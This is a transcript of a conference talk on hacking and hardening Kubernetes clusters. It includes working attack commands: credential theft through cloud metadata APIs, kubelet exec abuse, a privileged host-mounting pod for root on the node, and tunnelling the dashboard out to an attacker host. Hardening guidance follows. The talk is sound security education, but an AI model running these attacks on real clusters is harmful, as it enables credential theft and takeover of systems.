Hacking and Hardening Kubernetes Clusters by Example [I] - Brad Geesaman, Symantec

Captions
Okay, let's get started. Hello, my name is Brad Geesaman. Welcome to Hacking and Hardening Kubernetes Clusters by Example. If you want to grab the slide link, it's the first one here, and the GitHub repo that all the demos are run out of is in a separate window for me. You can also pull those two up in front of you if you're far back and not able to see the text. If it goes by a little too quickly, I have to apologize; I have to move fast because I have so much I want to show you. This talk is more of an index, so to speak: you can go back and dive in deep at your leisure.

A little bit about me: formerly a penetration tester and consultant, the last five or six years using the cloud almost exclusively, designing ethical hacking simulations, or capture-the-flag exercises. In the past year, at my former company, we were running capture-the-flag exercises on top of Kubernetes inside AWS. That sounds crazy, and it is a little bit, but we worked very hard to make sure it was a success. In the past few months I've spent a lot of time looking at as many clusters as I could, researching Kubernetes security and policy, and that body of research is what I want to share with you today.

Over the past five months I've installed a few clusters. I've dreamt that I was installing a cluster while I was asleep; it was very surreal. By show of hands, who has a cluster that's listed here, or uses an installer from this list, with one of those versions or similar? Okay, a fair number of you — welcome. How many of you run your own distro, rolled your own? Brave souls, awesome. These findings will still apply to you, I promise.

The biggest takeaway for me, from a security perspective, looking at all of these installation mechanisms: a malicious user with a shell can, by default — I'm saying "default" on purpose — very possibly and almost very likely exfiltrate source code, keys, tokens, and credentials, and elevate their privilege inside the cluster from a non-privileged state to a privileged state, which often then leads to root access on the underlying nodes. And I think bullet point number four is probably the most interesting, or at least the one that hasn't been talked about as much: expanding the blast radius to your entire cloud account, in some situations. I hope to move quickly enough to cover that in its entirety.

The goals of this talk: raise awareness of those high-risk attacks in as many installers and distributions as possible, so that everyone has that knowledge; demonstrate the attacks live — I'm not brave enough to type live, and I don't type quickly enough live, so these are recorded typing sessions, which also gives you the ability to examine them at home; and finally, provide hardening methods for those specific attacks, plus additional guidance that goes a few steps beyond that.

So, like Morpheus, I'm beginning to believe. High system complexity means that for users who are new to the project, getting it to work from an operator's perspective is hard enough. There's such a wide range of new terminology, tools, and mechanisms that most people use the defaults the first time through, right? "Look, they probably know better than me; I'm just going to accept the defaults and see how it works." But defaults tend to have inertia: defaults in use early tend to stay in use, and systems hardened late tend to break.
That's what I kept running into, left and right, as I was going through all these clusters. So my belief is that having default values be secure early on — in a project, or in how you distribute your project in source code — has positive downstream effects on the community, and when something like Kubernetes literally blows up with widespread adoption, that inertia is big, and it's real.

That leads us into what I call a security capability gap. I struggled with a name for it, but basically the community at large is somewhat behind the major dot releases as they come out — maybe you're between 1.5 and 1.7. Most mortals can't deploy a brand-new Kubernetes release overnight, but most installers and container-as-a-service offerings are keeping up. The trick is that security capabilities and features are arriving in the newer releases: if you're still on 1.5 or 1.6, RBAC is really rough for you, but in 1.7 and 1.8 it's been baked in and battle-tested. So it's tough, because you have to keep up with those ever-fast-moving releases, and it's up to you to add additional security hardening. If you're on 1.6 or 1.7, don't despair; it just needs a lot of elbow grease.

The things I want to talk about today are not extremely in-depth, esoteric attacks or kernel-level exploits. I'm talking about low-hanging fruit — I believe I found enough of it to share with you, and that's enough for a start. We want to raise the bar by doing the basics: image safety, RBAC, network isolation — enforcing the basic controls that already exist inside clusters.

So when you go to harden a cluster, what are some of the challenges? A lot of folks like to use DISA STIGs or CIS benchmarks to answer "what's the security posture of my cluster?" At the operating-system level, those benchmarks don't take into account the workload running on top: they check that your passwd and group files have the proper permissions, but they don't know anything about Kubernetes. Conversely, the CIS Kubernetes benchmark doesn't take the OS into consideration, nor how the installer places things — where it puts them and where it grabs them from in the cloud provider. So properly hardening your Kubernetes cluster is highly dependent on your environment, your add-ons, and your plugins, and the defaults are very often not enough. There are a lot of knobs you have to tweak, and we're going to go through some of them.

Next, something I like to call attack-driven hardening. This is just how I think — it's been built into me as a pen tester. Every time I look at a system, I reason about its security posture in progressive steps. I ask: from where I am, what can I see, do, or access next? I pick one of the most plausible methods and say, all right, assume that happened. Now what does it look like? What can I see, do, or access next? I repeat until it's game over — until the worst data has been found and extracted — and then I work backwards and harden as I go. It's basically quick-and-dirty attack modeling.
So everybody here today can take on the persona of the external attacker. Looking at a cluster, these are typically the methods you think of right off the bat. Are you going to get SSH access to the nodes? Maybe, but not likely. Go through the API server? Maybe, but not likely — you don't have credentials for either of those. But what about getting a shell in a container inside the cluster? That's where it gets interesting, and the three paths I came up with right off the bat are: exploiting an application running in an exposed container (that's hit or miss — not all apps are vulnerable to remote code execution); tricking an admin into running a compromised container (that's interesting); or compromising a project developer — compromising their GitHub keys or their Docker registry keys and modifying the project's images and binaries. Throughout this research I did find somebody's credentials in a git commit, by accident; I was just looking at code and I found them, and after I reported it, they confirmed the keys did indeed grant the ability to push to their company's Quay registry. So that is a real risk — protect your keys.

So which is easier? I'm going to pick on number two today: tricking an admin. I've written a couple of blog posts, but I've read thousands, and I found something of a pattern. They say, "Here's something really complicated; use my custom images. Hey, here's my Dockerfile, everything's on the up-and-up," and the instructions are: kubectl create -f from this URL, slam all these pods and services in, and then figure it out and see what happens. I like to think that kubectl create -f <URL> is the new curl-pipe-to-bash, because it really is — and it's often worse, because now it's distributed across thousands of nodes.

I know I said this is about hacking and hardening, so let's make with the hacking. For the rest of the attack structure, this is my 3D diagram of a sacrificial cluster: in the lower left you have the master node, and in the upper right you have two workers. Very straightforward, very simplistic. We've got a couple of pods running — not all are represented here, just the ones we care about in this case — and we have the metadata API represented as that yellow block up there.

So, my handy-dandy little attacker icon here: if he's able to exploit the vulnerable app in the default namespace and get a shell, can he install custom tools, and by doing so prove internet access? That's something penetration testers always love to have when they pull down their toolsets. Can I install curl and netcat? Can I pull down the kubectl binary, put it somewhere, and run it? That's always interesting.

Another thing to look at — it's not common anymore, but if you're running 1.4 or 1.5, a lot of the installers back then (or if you rolled your own) might still have the insecure bind address enabled on the API server. That's a big no-no, because there's no authentication or authorization on it: it's a direct path to cluster admin. Notice that little red triangle — that means a bad day, whenever you see a red triangle.

Whenever you're doing a penetration test and you break into that first system, the first thing you ask is: what does the world look like? I have no idea where I'm going, so normally I'm running scanning tools and throwing packets everywhere. Well, in a distributed system where everything is based on APIs, that enumeration is just a couple of curl commands. If I hit cAdvisor, heapster, the kubelet, Prometheus's node-exporter, kube-state-metrics — any of those — it's just "tell me about yourself," and the answer is "here's everything about myself": what's running, what it's named, where it's running, what the pod hashes are. Everything's right there.
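As a rough sketch, that enumeration from inside a compromised pod looks something like this — the node IP is a hypothetical value you'd discover during recon, and the ports are the historical defaults (cAdvisor on 4194, the kubelet read-only port on 10255), which may differ in your cluster:

  NODE_IP=10.240.0.5    # assumption: a worker IP found during recon
  # cAdvisor historically served unauthenticated metrics on 4194
  curl -s http://${NODE_IP}:4194/metrics | head
  # The kubelet read-only port lists every pod the node is running
  curl -s http://${NODE_IP}:10255/pods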
That leads me to my first demo. Because we have kubectl, because we have that access, we can list the nodes and see the IP address of one of them, and cAdvisor runs on 4194. Hit the metrics endpoint and cAdvisor will happily tell you everything about what's running on that system: the pod names (which are always randomized), the namespaces they're in, the container names, the versions, the SHA hashes — basically everything it's running. There's my Redis; we'll get to that guy later.

This next one I think is fairly well known, but it's incredibly important: the default service account token. It's auto-mounted at a well-known directory inside the container, and in a lot of clusters — specifically before RBAC — this is a really big deal. (If you have RBAC enabled, we'll get to some of that.) If you can run kubectl — sorry, "kube control," I was corrected this morning in the keynote — you can get pods, get secrets, and you're cluster admin. Again: red triangle, bad day. So we install some tools, download the kubectl binary, validate that we can hit the API — yes, we have the service account token mounted — get pods, list all the secrets, look for the good ones, and dump their contents. So for five curl commands, we've escalated.

Next, let's look at the Kubernetes dashboard. Raise your hand if you run the Kubernetes dashboard. Awesome. Are you running version 1.7 or higher of the dashboard? Okay. So, as you know, there's no authentication on it; it needs protection. If you're in this vulnerable app pod, most often you can just hit the dashboard by its service name — you don't even need to know its IP address. But it's a big dashboard and all we have is curl, so how do we see it? We can forward a port over SSH; that's really two commands away. So yes, from inside Kubernetes: get the service — yep, the dashboard's there; get the IP address by pinging it, which is a cheap way to do it without having dig installed; then SSH out to my bad IP — that's my attacking system — with remote port 8000 tunneled on down to the dashboard. On that remote hacking host, go to localhost:8000 and you have the full dashboard.

The same trick works for other services inside the cluster. As you can see, there's a vote app and a Redis: the azure-vote-front and azure-vote-back application. It's a very simple Python app with a Redis backend; you can vote for cats or dogs. Right — hack the vote. We're going to tamper with it, and I grew up with cats, so I'm going to pick on cats today. We get the azure-vote-back service and its IP — yep, port 6379 is open — install the redis-cli, connect to it (yep), and dump the keys. I'd like cats to be a thousand, so let's set cats to a thousand and go hit that front page. I apologize that it's rendered in curl, but you'll see it at the very bottom: cats is 1000, dogs is 6. Take that and extrapolate it to any unauthenticated service on the backend of your cluster — I just picked on Redis because it's simple and straightforward to demonstrate.
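A minimal sketch of that in-pod escalation — the token path and in-cluster API address are the standard defaults; whether the listing succeeds depends entirely on the cluster's (pre-)RBAC posture:

  # The default service account token is auto-mounted at this path
  TOKEN=$(cat /var/run/secrets/kubernetes.io/serviceaccount/token)
  APISERVER=https://kubernetes.default.svc
  # Ask the API server what we're allowed to see
  curl -sk -H "Authorization: Bearer ${TOKEN}" ${APISERVER}/api/v1/pods
  curl -sk -H "Authorization: Bearer ${TOKEN}" ${APISERVER}/api/v1/secrets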
Here's where it gets a bit more interesting: the kubelet "exploit." How many of you have heard of this attack method? Well, it's basically not an exploit — that's why it's in air quotes. The kubelet API allows this: in clusters without certain settings, the kubelet will let anybody connect to this endpoint, exec into containers, ask for logs, and do other nefarious things. So what we're going to do is ask the kubelet to run a command in a given container. With one curl command, we can say: "Hey, I want you to exec — list this directory inside that pod right there, running on that node." We get the node IPs; port 10250 is the read-write kubelet API, and 10255 is the read-only metrics port. We hit the runningpods method and cat it out into a file so it's easier to look at: a nice JSON object, very much like cAdvisor — everything the kubelet is running, complete with the hashes, the namespace, the pod name, and the container name, which is important for the next command. You've got azure-vote-front; that's what we're going to pick on. I'm going to look at the web directory of the azure-vote-front app: run is the action, default is the namespace, azure-vote-front plus its numbers is the pod name, and then the container name, and you just say: run the command, list the root directory. /app looks like an interesting directory; let's look in there. main.py looks interesting — and we've just extracted the source code for this super-sensitive application.

Okay: accessing the etcd service directly. Most clusters don't expose etcd to the workers, but some install a separate etcd instance to back Calico or another network policy backend, and in some cases that's exposed with no TLS, authentication, or authorization. In that case you may be able to defeat the very system that is storing your network policies: if there are network policies but you can hit this etcd endpoint, you can go in there as Calico, and Calico will happily remove all the network policies from the nodes in your cluster. This is pretty rare — I'll get to the frequency of this one.

Now, any of those methods I showed for getting a kubelet or a service account token may let you schedule a pod that mounts the host filesystem, add your own SSH key, and then SSH into the node. We're getting into the multi-step parts here. We get the node name as it's represented inside Kubernetes, and the external IP address of that node so we can SSH to it later. We create a very simple pod specification — I pick on nginx because it's based on Debian — make sure privileged is true, mount the root file path, and here's what it looks like with the nodeSelector in there, so it gets scheduled on that one specific node. We run it, exec into it, chroot into the mounted root filesystem, and now we're on the host as root. Add our own SSH key, and then SSH directly in. If you're root and you're able to run Docker containers under the hood that Kubernetes doesn't know about — running backdoors and such — it's a pretty bad day.
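A sketch of that node-takeover pod, assuming you already have working kubectl credentials and a node named worker-1 — the pod name, image, and mount path are all illustrative:

  cat <<EOF | kubectl create -f -
  apiVersion: v1
  kind: Pod
  metadata:
    name: attack-pod
  spec:
    nodeSelector:
      kubernetes.io/hostname: worker-1   # pin it to the target node
    containers:
    - name: shell
      image: nginx
      securityContext:
        privileged: true                 # so chroot gives us real root
      volumeMounts:
      - name: hostroot
        mountPath: /rootfs
    volumes:
    - name: hostroot
      hostPath:
        path: /                          # the node's entire root filesystem
  EOF
  # Then become root on the node itself
  kubectl exec -it attack-pod -- chroot /rootfs /bin/bash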
The last classification of attacks I want to talk about is accessing the metadata API. Who's heard of 169.254.169.254? Okay — we know what that is. One of the things it does is give an instance data about itself: what region it's in, its bootstrapping information, which in some of these installers' cases includes sensitive S3 paths or kubeadm join tokens. Right there, that's a bad day. But also, most of these cluster installations attach IAM instance roles to the workers and the masters, and the permissions that come with them are also available via that metadata API as AWS keys. They rotate every few hours, but they're just a curl command away. So let's curl them from that vulnerable pod we talked about: we run one command and get keys that are valid for a couple of hours, export them into the local shell on our attacking system, and now we have whatever permissions are attached to those keys. Describe instances: list all the instances in the entire account — not just your cluster, everything in that AWS account. Then describe the instance attribute called userData on every single instance in your entire cloud account. How many of you have sensitive things in user data on things that are not Kubernetes? Maybe? Possibly? That's why this blast radius is pretty bad: you might not compromise the Kubernetes cluster itself, but that web server over there that bootstraps with a GitHub key or something delivered via user data — you can reach over and grab it. That's a bad day for the other administrators.

When I talk about IAM permissions, the masters and workers typically have something that looks like this: Describe* for the workers; the masters have ec2:*, the ECR ability to pull images from AWS ECR, and some S3 capabilities. But we really want that ec2:*, don't we? That means any AWS EC2 command is available to us. So how do we get it? We need to make sure the curl originates from the master, and there are a couple of ways of doing that: compromise an existing pod running on the master — that's kind of tough — or use one of those two issues we just talked about. If you find a service account token, just ask the API server, or just ask the kubelet running on the master, to run a command for you inside a pod. It looks like this: basically wrapping our curl command this way, or this way. Notice how close they are — it's the same thing, just asking somebody different to do it.

And the final example of why this is a bad day: if you have ec2:*, you can create a new VPC, a new security group, a new SSH key, and a new instance, snapshot every volume from every single instance in your entire cloud account, and then go mount them on that instance. As you can imagine, that can be automated within five or ten minutes. It's a pretty bad day. And if you're on the master, in some cases — based on the installation defaults — you might also be able to list everything in AWS S3. Who stores logs and sensitive backups in S3? It's a bad day.
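As a sketch, stealing those node credentials from inside a pod looks like this — the endpoints are the standard EC2 metadata paths, while the follow-on AWS CLI calls assume you've exported the stolen keys on your attacking machine:

  # The first call returns the IAM role name attached to this node
  ROLE=$(curl -s http://169.254.169.254/latest/meta-data/iam/security-credentials/)
  # The second returns AccessKeyId, SecretAccessKey, and a session Token
  curl -s http://169.254.169.254/latest/meta-data/iam/security-credentials/${ROLE}
  # Exported locally, those keys drive the enumeration described above:
  #   aws ec2 describe-instances
  #   aws ec2 describe-instance-attribute --attribute userData --instance-id i-...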
For attacks nine and ten I'm switching gears to GKE and GCE — GKE specifically. There's an attribute, much like the user-data endpoint on the AWS API, called kube-env; it's what the kubelet uses to bootstrap itself and get its keys, and it's often reachable directly. So here's the listing. As part of the security features, you do have to pass a header into Google's metadata API, to make sure you're not hitting it through a server-side request forgery. configure.sh looks interesting, kube-env looks interesting, user-data looks interesting — so we go poke at those. This one references kube-env, and right there you see there's a lot of good stuff: we know what the release is, we know where it's getting things from, we know the IPs of the master, and we can see the kubelet's credentials in there — the key, cert, and CA PEM.

This wall of text is what I call the one-shot: if you get a shell on a container inside of GKE, you can become the kubelet with this one awesome bash hunk of junk. Pull down a kubectl, grab the kube-env from the metadata API, strip out the parts, base64-decode them into the kubelet's authentication credentials, and then run kubectl to list all the pods in all the namespaces. Boom.
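A sketch of that one-shot, assuming the legacy metadata endpoint is reachable from the pod — the variable names follow the kube-env convention on GCE/GKE nodes at the time, and MASTER_IP would come out of the same kube-env listing:

  # Grab the kubelet's bootstrap material from the metadata API
  curl -s -H "Metadata-Flavor: Google" \
    "http://metadata.google.internal/computeMetadata/v1/instance/attributes/kube-env" -o kube-env
  # Carve out the kubelet's client credentials and decode them
  grep "^KUBELET_CERT:" kube-env | awk '{print $2}' | base64 -d > kubelet.crt
  grep "^KUBELET_KEY:"  kube-env | awk '{print $2}' | base64 -d > kubelet.key
  grep "^CA_CERT:"      kube-env | awk '{print $2}' | base64 -d > ca.crt
  # Talk to the API server as the kubelet
  ./kubectl --client-certificate=kubelet.crt --client-key=kubelet.key \
    --certificate-authority=ca.crt --server=https://${MASTER_IP} \
    get pods --all-namespaces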
One thing of note: you probably want the secrets, right? Well, the kubelet doesn't have the ability to list all the secrets, but it can pull a secret if it knows its name. The best way to get that is to output get pods in YAML for a pod you know about — I used the dashboard here, because I know it's got a cluster-admin token. Say "hey, dump the pods back in YAML," and it will tell you the mounted secret by name. Now that you know what it is, you can go get that secret directly, and in this case it's the default service account token in the kube-system namespace. What we'd do with that is the same thing as before — mount the host filesystem, add an SSH key, and SSH in — so I'm going to skip that part for the sake of speed.

The second method through the GKE and GCE metadata API: just like EC2 assigns permissions to instances, GKE does the same thing, giving you an IAM token along with instance scopes, and that IAM token lets you talk to the Google Compute API and run actions on anything inside the scope of that project. One of the things you can do, of course, is enumerate all the instances, but you can also use a really handy-dandy API method for adding an SSH key. If you have those privileges and that token, you can, from worker-1, call for the token and then hit the API saying "add my SSH key to worker-2," and Google will happily do it. Then you can SSH into worker-2 — or anything else inside the scope of that project. If you're running multiple clusters, that means any of the nodes in all of the clusters in that same project.

So: we get the external IP, so we know what to SSH into when we're done, and we list the instances in the project. We'll page through it a little so you can see how much information is here — a lot of good stuff: IP addresses, external NATs, the user data, the kube-env for all the instances in the project. It's the equivalent of an AWS ec2 describe-instances, inside Google. Then I do the same thing but describe a single instance, so I can see everything about this one node and get its fingerprint, which is needed for this API call. Forgive me — I use curl and bash to keep it simple, which makes it a little ugly, but you don't need to download any extra tools; there's no malware running here, it's all curl and bash. We make a POST body with that fingerprint we just pulled, add my SSH key — you can see the public key — and POST it to the API; that's what the final post body looks like rendered. "Google, go add me to worker-2." It happily does it, and we're root on that second node. Again: a bad day.

Okay, so how prevalent are these issues? This is what compelled me to do this talk, and I want to stress something: this is not the entire security posture of each of these clusters. It's the narrow band of items I've identified here; it says nothing about the rest. And note the specific versions, the ones I tested — I started testing in August and September, and we'll get to what the latest releases look like. So it's prevalent, right? You'd admit it's not uncommon. But don't despair: we can fix it; we have the technology.

For attacks seven through ten, if you're running in AWS, I recommend what's called a metadata proxy — something that makes sure that when a pod goes to 169.254.169.254, it's actually allowed to. kube2iam and kiam both worked in my testing to take care of that in AWS. For Google, use the GCE metadata proxy and "these steps" — I apologize, those words are actually masking Google's GKE hardening blog post that was released very recently; that's an incredibly important link, a late addition, and it's really useful for blocking the attacks I just showed. If you're running network policy on 1.8, egress blocking is also a valid method, and on older versions of Kubernetes, if you're using Calico, you can use calicoctl under the hood to get the same effectiveness — it's not through the Kubernetes API, but you can do it.

Protect the kubelet: authorization-mode webhook. If you don't see that setting, your kubelet is probably allowing that kubelet "exploit" bit.

Isolate your workloads. Remember the hack-the-vote, where we changed it to cats? A very simple network policy literally stops that in its tracks: every pod that has the label azure-vote-back only gets ingress from azure-vote-front.

This next one is almost a 99%-perfect drop-in: if you're running the dashboard and you have network policy ingress support, drop it in and it will protect your dashboard. It's a bit of a trick: we have a pod selector that matches the kubernetes-dashboard only, but there are no rules, so by default that means deny everything. Note that this does not block kubectl proxy, which works through the API server; it blocks traffic from pods, which have no business talking to the dashboard.

Restrict the default service account token: Node RBAC and the NodeRestriction admission controller. And I want to stress something — you have to exec into the pods and verify this. It's very easy to miss or to do incorrectly when you're messing with RBAC. And monitor all your RBAC audit failures: either you have a misconfiguration in your app, or somebody's attacking you and failing.

I'm happy to say that with 1.8 and above supporting egress natively, this policy works in your clusters as a really nice default-deny platform. Apply it to every single one of your namespaces: ingress and egress, nothing is allowed by default in this namespace — nothing except kube-dns lookups, to start. Put this down as a cluster administrator, and then deploy the network policy for your workloads with the workload lifecycle: when you deploy azure-vote-front and back, apply the network policy that allows those two to work together, at that time.
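As a sketch of that default-deny baseline in 1.8 NetworkPolicy syntax — the kube-dns label and ports shown here are common defaults, so verify them against your own cluster before relying on this:

  cat <<EOF | kubectl apply -f -
  apiVersion: networking.k8s.io/v1
  kind: NetworkPolicy
  metadata:
    name: default-deny-all
    namespace: default            # repeat for every namespace
  spec:
    podSelector: {}               # selects all pods in the namespace
    policyTypes:
    - Ingress
    - Egress
    egress:
    - to:
      - namespaceSelector: {}
        podSelector:
          matchLabels:
            k8s-app: kube-dns     # allow DNS lookups and nothing else
      ports:
      - protocol: UDP
        port: 53
      - protocol: TCP
        port: 53
  EOF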
And I'm happy to say that throughout these last five months I've worked with every single one of these projects directly, disclosing the issues I found. In a lot of cases fixes were already in progress, already in flight. With newer releases — Kubernetes 1.8 — and a little bit of elbow grease, we can look like this: we can literally wipe out this classification of vulnerabilities for good, and make infrastructure nice and boring.

Two tools I want to tell you about. kubeatf is a tool I wrote to help automate the creation, validation, and destruction of all these clusters in a sane way, because I was spinning them up every day for a couple of hours and throwing them away, over and over, across all of them. And for Heptio Sonobuoy, I wrote a plugin — basically a proof of concept, and there's so much more you can do with this — that currently runs a CIS benchmark using Aqua Security's kube-bench. By deploying this plugin into Sonobuoy, we can continually scan our nodes for posture assessment in a very sane way.

Now, even more security hardening tips. This is where it goes above that line on the apple tree I showed you; this is where it gets a little more advanced. Let's assume you've done all the things I just suggested — here's what to look at next. Verify that all your settings are properly enforced: I can't tell you how many times I thought I'd hardened something, went to validate it, and found I hadn't done it quite correctly — didn't get that label just right, and so on. It's important to validate. Keep up with the latest versions if you possibly can, because useful security features are being added in every dot release. Audit at all the levels you can — the OS, the runtime, and Kubernetes; I like the CIS benchmarks — and log everything outside the cluster; that's important. Practice safe image security; there are all sorts of good talks, blog posts, and tools that help with that. I've already covered the Kubernetes components a bit. The network security policy bit is incredibly important now that we have ingress and egress: use it to your advantage. You can mask a lot of attacks just by not having network access. Protect your workloads by default by saying no ingress and no egress, and then apply what is allowed — it's whitelisting, not blocklisting.

I added this the other day: consider a service mesh. There are a lot of benefits beyond what it does for your application — visibility, mutual TLS — and it also makes your workloads more isolated when they talk to each other, just by default, in how it works. I think some folks have talked about this before, but namespace tenancy is really good when you combine it with that default-deny policy set: if you have a microservice here, a microservice here, and a microservice here, they're all default-deny and can't talk to each other until you allow it. You can be explicit.

This is something we learned from the capture-the-flag exercise: make sure CPU and RAM limits are set on all containers (I know disk and network limits are somewhere down the line), to prevent malicious actors from filling the disk or consuming all the RAM with their tools. And something people don't talk about, which I think is kind of interesting: in your pod specs, if you're running a pod that has no business talking to the API server, don't mount the service account token. You don't need it; don't put it there, even if it has no permissions — defense in depth. Finally, use a pod security policy to enforce container restrictions and protect the node; that's something that's going to mature over the next few releases.
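A sketch combining those two pod-spec tips — the name, image, and limit values are illustrative, and the automountServiceAccountToken field assumes a 1.6+ cluster:

  cat <<EOF | kubectl apply -f -
  apiVersion: v1
  kind: Pod
  metadata:
    name: no-token-app
  spec:
    automountServiceAccountToken: false   # this pod never talks to the API server
    containers:
    - name: app
      image: nginx
      resources:
        limits:
          cpu: 500m          # cap runaway or malicious CPU use
          memory: 256Mi      # cap runaway or malicious RAM use
  EOF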
And a shout-out to some of the vendors I talked to — this is kind of an important note: container-aware malicious activity and behavioral detection capabilities are incredibly important for stopping the initial attack right where it starts, at the syscall level. A shell cannot spawn, a curl cannot be downloaded or exec'd, and so on — you stop the attacker in their tracks, right down there at step number three.

On the miscellaneous security front: use separate cloud accounts, projects, or resource groups for different workloads or different clusters — I think a one-to-one mapping is safest for now; there are just too many ways to hop across. Don't run dev and test workloads in the same clusters, or the same places, as production — again, because there's so much opportunity for crossover. And depending on your regulatory requirements, use separate node pools for separate workloads, using annotations to make sure sensitive stuff happens here and non-sensitive stuff happens over there.

Here are some of the tools I came across that I found notable when you're looking at auditing. The CIS benchmark has been updated for 1.8 and is a great resource; kube-bench implements it nicely and is very straightforward to run. The CIS OS and runtime hardening work from dev-sec, and ansible-hardening from Major Hayden and the other folks from OpenStack, are really good at making sure the underlying posture of your systems is solid. And kubeaudit, which I'm looking forward to — I think that's the next talk — and Sonobuoy; I think there's a lot of room for growth in this space.
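For reference, a sketch of running kube-bench against a node, following the invocation style its README documented at the time — the image tag and mounts may differ in current releases:

  # Run the CIS Kubernetes node checks from a container with read-only
  # access to the host's config; --pid=host lets it inspect host processes.
  docker run --pid=host \
    -v /etc:/etc:ro -v /var:/var:ro \
    -t aquasec/kube-bench:latest node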
Notable security features in 1.8: network policy and pod security policy. Whitelisting egress is huge, and volume-mount whitelisting prevents a lot of those node-access bits I was just showing you.

So in closing: as a community, we're all responsible for the safety and security of the applications that power our world. Let's make that foundation secure by default, and incredibly boring. Thank you. [Applause]

Okay — first I want to say thanks to all those folks listed on the left there, and now I can take some questions. Anyone? Yes: some of those installers implement kubeadm, and it's the join token — you've got to protect that — and then there's a lot of good stuff that happens, yes: certificate rotation, expiration. Yep.

Yes sir — the question is, what's the number one thing? All of the above, but the first thing is enabling RBAC. A huge classification of these things doesn't happen in a properly configured, RBAC-enabled cluster. The rest you still have to do, because notice how everything I was doing required no special tools; it was just access that you already have. Combining RBAC with network policy shuts off nearly everything to start. You might have a vulnerable kubelet — the kubelet "exploit" — but if you have an egress policy, you can stop that network access, assuming you've put it on every one of your namespaces. So you can mitigate and work around, without having to fix the underlying things, with some clever policies.

Yes sir — I knew that question was coming: did I look at OpenShift? The answer is yes. I wanted to focus on vanilla Kubernetes, because as you know, OpenShift is a slightly opinionated distribution of Kubernetes. The only thing I've talked about that applies to OpenShift by default is the metadata API — however, they don't put anything sensitive in user data, and they don't attach any IAM credentials to those workers by default. If you go ahead and add those yourself, then they're available and you'll need the metadata proxies, but that's the only thing. I hesitated to lump it in there because it's such a different beast compared to how all these line up; it would be a little bit of an unfair comparison. But I would highly recommend you look at OpenShift, at least as a reference point for their security model — and that's without plugging; I have no horse in the race. All right, I'll be in the hallway for any questions. Thanks so much. [Applause]
Info
Channel: CNCF [Cloud Native Computing Foundation]
Views: 30,680
Rating: 4.949821 out of 5
Id: vTgQLzeBfRU
Length: 39min 30sec (2370 seconds)
Published: Fri Dec 15 2017